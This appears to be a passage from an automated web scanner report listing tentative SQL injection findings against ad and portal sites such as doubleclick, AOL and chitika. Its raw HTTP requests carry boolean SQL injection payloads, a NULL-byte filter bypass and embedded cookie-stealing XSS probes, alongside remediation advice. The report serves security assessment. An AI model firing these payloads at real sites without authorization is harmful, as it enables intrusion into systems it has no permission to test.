32.54. https://www.blackberry.com/profile/

32.55. http://www.csc.gatech.edu/copeland/jac/6612/info/SSH-No-Password-Login.txt

32.56. http://www.download32.com/images/thumb/Bricolsoft_Zip_Compression_Library-161033.png

32.57. http://www.download32.com/images/thumb/mso2%20thum.gif

32.58. http://www.filetransit.com/images/thumb/2d87c03cd41f91bf73891204a7e5136d_Axence_NetTools_Pro.gif

32.59. http://www.filetransit.com/images/thumb/dc6c5c025c75144466152decaf8b7627_Magic_Basket.jpg

32.60. http://www.freedownloadscenter.com/Reviews/

32.61. http://www.freedownloadscenter.com/favicon.ico

32.62. http://www.google.com/uds/Gfeeds

32.63. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx

32.64. http://www.jazdtech.com/techdirect/lg/logImpressions.htm

32.65. http://www.khabbr.com/

32.66. http://www.kledy.de/checkfield.php

32.67. http://www.linuxsecurity.com/images/distros/dist-foresight.gif

32.68. http://www.linuxsecurity.com/static-content/packetstorm.html

32.69. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/box-header-top-left.png

32.70. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/box-header-top-right.png

32.71. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/contribute.png

32.72. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/ls-logo.gif

32.73. http://www.mittelstandsblog.de/wp-content/themes/j4b20/gam_header.js

32.74. http://www.netvouz.com/web/images/favicon.ico

32.75. http://www.netvouz.com/web/images/h6_green.png

32.76. http://www.netvouz.com/web/images/searchtips.gif

32.77. http://www.orthougm.com/favicon.ico

32.78. http://www.orthougm.com/ldr.js

32.79. http://www.owneriq.com/images/favicon.ico

32.80. http://www.vibrantmedia.com/about/careers.asp

32.81. http://www.w3.org/TR/html4/loose.dtd

32.82. http://www.w3.org/TR/html4/strict.dtd

32.83. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

32.84. http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd

32.85. http://www.whselfinvest.de/banner/whsbanner.php

32.86. http://www2.sesamestats.com/paneltracking.aspx

33. Content type is not specified

34. SSL certificate

34.1. https://splunk.webex.com/

34.2. https://static.addtoany.com/

34.3. https://www.box.net/

34.4. https://www.infosecisland.com/



1. SQL injection  next
There are 67 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [fu parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The fu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00'&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 23:05:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14517

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00''&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 23:05:40 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11429

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:336px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the url parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d1--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 22:43:12 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5053

<html><head><style>#abg{font-family:arial,sans-serif;font-size:12px;color:#000000;padding:0px 1px;white-space:nowrap;font-weight:bold;}.sep{height:2px;width:100%;}.bb{overflow:hidden;width:120px;}.al{
...[SNIP]...
length;++i)qs+='kw'+i+'='+adt[i]+'&';qs=qs.slice(0,-1);return rl_dest_url+qs;}function ss(wi){window.status=sl[wi];return true;}function cs(){window.status='';}i=0;adt=[];adt[i++]="Security";adt[i++]="Linux";adt[i++]="Vulnerability";adt[i++]="LAN+Software";var sl=[];</script></head><body bgcolor=#e6e6e6 text=#000000><table bgcolor=#e6e6e6 border=0 cellpadding=0 cellspacing=0 height=100% width=100% ><tr><td height=18 bgcolor=#e6e6e6 valign=middle><div class=bb><script>adu='';document.write('<a href="https://www.google.com/adsense/support/bin/request.py?contact=abg_afc&url=http://www.linuxsecurity.com/advisories/%3F1%27%3D1%27%2520and%25201%3D1--&hl=en&client=ca-pub-8946084125644802');if(adt.length==0)document.write('&adU=+'+'&adT=no+AdLinks+found');for(i=0;i<adt.length;++i)document.write('&adU='+(adu+='+')+'&adT='+adt[i]);document.write('" target=_blank id=abg>Ads by Google</a>');</script></div></td></tr><tr><td valign=top><div class=al style="padding:0px 0px"><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKAAARBlgrlZ6egRAtDEghTZWN1cml0eRoIduiH12Hhbe8oAVITCIKw58mL8qYCFV1n5QodGm4-Ag")+"&okw=Security\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Security';</script>Security</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKAAARBugrlZ6egRAtDEgVMaW51eBoI6d0Htx_VVAsoAVITCIKw58mL8qYCFV1n5QodGm4-Ag")+"&okw=Linux\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Linux';</script>Linux</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKAAARBvgrlZ6egRAtDEg1WdWxuZXJhYmlsaXR5GgjjreViiTH32SgBUhMIgrDnyYvypgIVXWflCh0abj4C")+"&okw=Vulnerability\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Vulnerability';</script>Vulnerability</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKAAARBwQrlZ6egRAtDEgxMQU4gU29mdHdhcmUaCJ1Raqvn
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d2--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 22:43:13 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5032

<html><head><style>#abg{font-family:arial,sans-serif;font-size:12px;color:#000000;padding:0px 1px;white-space:nowrap;font-weight:bold;}.sep{height:2px;width:100%;}.bb{overflow:hidden;width:120px;}.al{
...[SNIP]...
length;++i)qs+='kw'+i+'='+adt[i]+'&';qs=qs.slice(0,-1);return rl_dest_url+qs;}function ss(wi){window.status=sl[wi];return true;}function cs(){window.status='';}i=0;adt=[];adt[i++]="Security";adt[i++]="Software";adt[i++]="Linux";adt[i++]="Vulnerability";var sl=[];</script></head><body bgcolor=#e6e6e6 text=#000000><table bgcolor=#e6e6e6 border=0 cellpadding=0 cellspacing=0 height=100% width=100% ><tr><td height=18 bgcolor=#e6e6e6 valign=middle><div class=bb><script>adu='';document.write('<a href="https://www.google.com/adsense/support/bin/request.py?contact=abg_afc&url=http://www.linuxsecurity.com/advisories/%3F1%27%3D1%27%2520and%25201%3D2--&hl=en&client=ca-pub-8946084125644802');if(adt.length==0)document.write('&adU=+'+'&adT=no+AdLinks+found');for(i=0;i<adt.length;++i)document.write('&adU='+(adu+='+')+'&adT='+adt[i]);document.write('" target=_blank id=abg>Ads by Google</a>');</script></div></td></tr><tr><td valign=top><div class=al style="padding:0px 0px"><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj5xQrlcYyjh3oiEghTZWN1cml0eRoILxoQuM7pVhEoAVITCPKbt8qL8qYCFaFo5QodYB-HBQ")+"&okw=Security\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Security';</script>Security</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj52grlcYyjh3oiEghTb2Z0d2FyZRoIm_sh5ojTnt4oAVITCPKbt8qL8qYCFaFo5QodYB-HBQ")+"&okw=Software\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Software';</script>Software</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj53QrlcYyjh3oiEgVMaW51eBoIpJh5TtXxJbsoAVITCPKbt8qL8qYCFaFo5QodYB-HBQ")+"&okw=Linux\" onMouseOver=\"return ss("+sl.length+")\" onMouseOut=\"cs()\" class=alt target=_top>");sl[sl.length]='View ads about Linux';</script>Linux</a><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a href=\""+gurl("ChBNTdKBAAj55wrlcYyjh3oiEg1WdWxuZXJhYmlsaXR5Gghi_ZPH7iTPeygBUhMI8pu3yovypgIVo
...[SNIP]...

1.3. http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://latino.aol.com
Path:   /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10145548'%20or%201%3d1--%20 and 10145548'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d1--%20=1 HTTP/1.1
Host: latino.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 17:30:07 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb11.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 15575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<label for="srchtog1" class="srchtogt">Espa..ol</label>
<input type="radio" name="lr" id="srchtog2" value="lang_en" onclick="omcl(this,'srchtoggle2')" checked /><label for="srchtog2" class="srchtogt">Web</label>
<input id="srchrp" type="hidden" name="rp" value=""/>
</div>
</form>
</div>
</div>
</div>
<script type="text/javascript">
var se=1;
p_o('topQuery2').focus();

</script>
</div>
<div id="nav"><div id="navW" class="M">
<div class="dir">
<div id="dirhd">
<ul id="dhL2">
<li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li>
</ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div>
<div id="dircnt">
<ul id="om_dir_col1_" class="serv c noic"></ul>
<ul id="om_dir_col1_" class="serv c0 noic">
<li><a id="d1" title="IM friends right from your browser -no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>

<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>

<li><a id="d3" title="African-American news, culture and community" class="nIcn" onclick="icid(this,'icid=navbar_BV');" href="http://blackvoices.aol.com/">Black Voices</a></li>

<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope
...[SNIP]...

Request 2

GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d2--%20=1 HTTP/1.1
Host: latino.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 17:30:07 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb28.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Length: 15603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<label for="srchtog1" class="srchtogt">Espa.../label>
<input type="radio" name="lr" id="srchtog2" value="lang_en" onclick="omcl(this,'srchtoggle2')" checked /><label for="srchtog2" class="srchtogt">Web</label>
<input id="srchrp" type="hidden" name="rp" value=""/>
</div>
</form>
</div>
</div>
</div>
<script type="text/javascript">
var se=1;
p_o('topQuery2').focus();

</script>
</div>
<div id="nav"><div id="navW" class="M">
<div class="dir">
<div id="dirhd">
<ul id="dhL2">
<li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li>
</ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div>
<div id="dircnt">
<ul id="om_dir_col1_" class="serv c noic"></ul>
<ul id="om_dir_col1_" class="serv c0 noic">
<li><a id="d1" title="IM friends right from your browser -..no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>

<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>

<li><a id="d3" title="African-American news, culture and community" class="nIcn" onclick="icid(this,'icid=navbar_BV');" href="http://blackvoices.aol.com/">Black Voices</a></li>

<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope
...[SNIP]...

1.4. http://mm.chitika.net/minimall [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The cb parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cb parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00'&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:28 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=G/SkJTIBohB5z2pknKpk7dMBnVZJ1DBBLfD22Pt+xU2PMB6YwzEpG+32MdrC/bifzPdADvQXT5iL0Ejk4SoBE/RbcgLQI0z29hms4++5c518R/zUMKkBDANZDDcfeSSJsmKZKYF4g+e5/vR3s5vQQ7KmJYRZ2Ke5I7+Px/Q1DWIeAxjVePvZA3qEWPWNA4pW0y2sicSGc+OlVoHYO+iW+etQJWO903qBRjyUMB0CsnUiLCSK7ynCeU5y8vPgJO/l5QmFEhQcxYvOtJH0zTOq/DdkOdd/SL0ajHQz1t4DCzkykwGq4Aw7x+tPgkAhoQGPt9IleOihg6gLkHmyjN8bS0MOCuU93O5YHhVCLopbJlVmacuwMv8bCtG3aUjz7yVRP2bGb25zrFQSIASGHiNo65FqRryWti1di9zr7c4KSwyrOw==.dJDZXe3hTuyZrPKKuugNLQ.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 19714

var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=pc-test.com,gofreemanuals.com,ebay.c
...[SNIP]...
KCpxo9ichxH8ldyrWDOlTDIX0nEp9dmoIMEEUHcDE0aWSuqd0ezjPzLg2vwq7QhRJ6IBfF5G6sqRQsBqlrfmecBnceMPA%2FNVxpMVm55EolFY76tnNe82&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture-->
...[SNIP]...

Request 2

GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00''&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1
Host: mm.chitika.net
